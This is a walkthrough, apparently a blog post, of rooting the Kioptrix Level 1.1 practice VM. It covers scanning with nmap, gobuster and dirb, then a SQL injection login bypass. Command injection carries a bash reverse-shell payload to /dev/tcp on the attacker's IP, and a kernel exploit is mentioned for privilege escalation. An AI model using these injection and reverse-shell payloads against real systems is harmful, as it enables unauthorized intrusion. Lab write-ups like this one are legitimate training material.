KIOPTRIX: LEVEL 1.1 (#2) walkthrough

The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player 😜). The purpose…

The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player 😜). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more than one way to successfully complete the challenges.

Kioptrix: Level 1.1 (#2)
This website uses 'cookies' to give you the best, most relevant experience. Using this website means you're happy with…

Discovery

Find the Vuln machine using the netdiscover tool. We have to do this since we do not know the IP assigned to the Vuln Machine.


Enumeration

“Know the Enemy and Know Yourself🔎

I always use the NMAP scan on all ports(-p-) cause we have to be sure we do not leave any minor details.

sudo nmap -p- -T4 -A 192.168.103.143


More Enumeration 💕

  • 22|SSH
Only User Enum Available.
  • 80|HTTP
  1. See the website and their Source Code.
We can see a login Portal.

The first thing comes to my mind when i see a login portal is SQLi 👻. Then, i might try default passwords such as admin:admin,admin:password,root:root.🤔

We got a username ‘Administrator’🧙🏻‍♂️

2. Always Nikto along side of Gobuster + dirb.

Apache/2.0.52 (CentOS) + PHP/4.3.9
results based on Apache/2.0.52

Possible ones to check are

  • Apache + PHP < 5.3.12 / < 5.4.2 — cgi-bin Remote Code Execution🤔
  • Apache < 2.2.34 / < 2.4.27 — OPTIONS Memory Leak🤔
gobuster dir -f -x php,html,txt -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.103.143 -n -q -e
dirb http://192.168.103.143 -N 403 -r
  • 111|rpcbind
No special services which is using RPC.
  • CUPS 1.1
Got no Information😵
searchsploit output.

Exploring Exploits

Can you imagine what I would do if I could do all I can?” — Sun Tzu 🧙🏻‍♂️

I have listed all the possible point of attack from the previous steps.

  • Apache + PHP < 5.3.12 / < 5.4.2 — cgi-bin Remote Code Execution
  • Apache < 2.2.34 / < 2.4.27 — OPTIONS Memory Leak
  • SQLi

Let’s try one by one 🤓…

  1. Apache + PHP < 5.3.12 / < 5.4.2 — cgi-bin Remote Code Execution
php 4 is not affected 😩

2. Apache < 2.2.34 / < 2.4.27 — OPTIONS Memory Leak

No luck here as well…😩

3. SQLi

  • Creds: Administrator:’ OR 1 — -

It looks like we can go for OS command Injection. Let’s try 8.8.8.8;ls as the input.

this confirms if bash exists.

Payload : 8.8.8.8 && bash -i >& /dev/tcp/192.168.103.182/4444 0>&1

Got the shell ;p 😍

Privilege Escalation

“There are not more than five musical notes, yet the combinations of these five give rise to more melodies than can ever be heard.There are not more than five primary colors, yet in combination they produce more hues than can ever been seen.There are not more than five cardinal tastes, yet combinations of them yield more flavors than can ever be tasted.” — Sun Tzu 🧙🏻‍♂️

Enumeration

Using the above info to find a kernel exploit.

Transfer the file to the Vuln machine…👻

Rooted❤️

“If the mind is willing, the flesh could go on and on without many things.”— Sun Tzu